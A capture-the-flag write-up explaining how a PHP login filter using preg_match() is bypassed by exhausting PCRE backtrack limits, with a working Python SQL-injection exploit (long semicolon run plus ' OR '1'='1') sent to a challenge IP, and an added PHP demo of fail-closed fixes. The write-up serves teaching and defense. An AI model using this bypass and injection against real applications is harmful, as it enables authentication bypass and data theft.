0xl4ugh CTF : SimpleWAF

We get a website similar to the one from the Micro challenge, but with different source code.

Writeup

We are given the source code of the challenge. Both form fields are concatenated straight into the query, so there is an SQL injection on this line:

$res = $conn->query("select * from users where username='$username' and password='$password'");

But before the query runs, the input has to get past this check, which rejects anything that is not a lowercase letter:

if(preg_match("/([^a-z])+/s",$input))

The regex matches any run of one or more non-lowercase characters. preg_match() returns 1 when the pattern matches, 0 when it does not, and false when an error occurs, and because the check is a plain if(preg_match(...)), both 0 and false let the input through. So the goal is to make preg_match() fail rather than match while still sending forbidden characters. The PHP documentation lists the failure conditions: the PCRE engine abandons the match when it exceeds its backtrack limit, its recursion (depth) limit, or, with pcre.jit enabled, its JIT stack.

The weak spot is the + applied to a capturing group. For every character the group consumes, PCRE has to save a state it could backtrack to (including the capture to restore), so the memory and work needed grow with the length of the run of non-lowercase characters. PHP caps that work (pcre.backtrack_limit and pcre.recursion_limit for the interpreter, the JIT stack size when pcre.jit is on). Once the cap is hit nothing crashes: the match is simply abandoned, preg_match() returns false instead of 1, and preg_last_error() reports PREG_BACKTRACK_LIMIT_ERROR, PREG_RECURSION_LIMIT_ERROR or PREG_JIT_STACKLIMIT_ERROR depending on the configuration.

So all we need to do is prefix the injection with a long run of non-lowercase characters, enough to make the regex engine give up:

import requests

# 10,000 ';' characters (each one a non-lowercase character the capturing
# group has to consume) push the regex past its limit, so preg_match()
# returns false and the filter is skipped. The rest is the actual injection:
# ' OR '1'='1' closes the username string and makes the WHERE clause true;
# the trailing ';' plus NUL byte are meant to end the statement there so the
# password comparison that follows is dropped.
data = {"username": ";" * 10_000 + "' OR '1'='1';\x00",
        "password": "admin",
        "login-submit": ""}
r = requests.post("http://20.115.83.90:1339/", data=data)
print(r.content)
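To make the difference between a 0 and a false return visible, here is an added PHP example (not the challenge's source code) that puts the challenge's check next to two fail-closed variants. The function names, the sample inputs and the logging are assumptions for the illustration:

```php
<?php
// Added example, not the challenge's own code. Function names are assumed.

// The challenge's check: anything other than 1 lets the input through,
// including the false that preg_match() returns when PCRE gives up.
function waf_original(string $input): bool {
    return !preg_match("/([^a-z])+/s", $input);   // true = input allowed
}

// Same regex, but only a clean 0 (no match) allows the input. An engine
// error (false) is treated as a block and logged, which is what a filter
// should do: fail closed.
function waf_fail_closed(string $input): bool {
    $r = preg_match("/([^a-z])+/s", $input);
    if ($r === false) {
        error_log("preg_match() failed: " . preg_last_error_msg()); // PHP >= 8.0
        return false;
    }
    return $r === 0;
}

// No regex at all: ctype_lower() is true only for a non-empty string made
// entirely of a-z, so there is no engine state that can be exhausted.
function waf_ctype(string $input): bool {
    return ctype_lower($input);
}

// Constructed inputs: a benign username and the writeup's payload.
$inputs = [
    'alice',
    str_repeat(';', 10000) . "' OR '1'='1';\0",
];

foreach ($inputs as $input) {
    $label = strlen($input) > 12 ? substr($input, 0, 9) . '...' : $input;
    printf("%-12s original=%-5s fail_closed=%-5s ctype=%-5s\n",
        $label,
        var_export(waf_original($input), true),
        var_export(waf_fail_closed($input), true),
        var_export(waf_ctype($input), true));
}
// Whether the long payload slips past waf_original() on a given box depends
// on pcre.jit, pcre.backtrack_limit and pcre.recursion_limit; if it does,
// preg_last_error_msg() names the limit that was hit.
```

Run it with `php -f` on a default php.ini and compare the three columns for the second input: the original check reports the payload as allowed while both alternatives reject it. Lowering pcre.backtrack_limit (for example `php -d pcre.jit=0 -d pcre.backtrack_limit=1000 -f ...`) shows the same bypass with a much shorter run of semicolons.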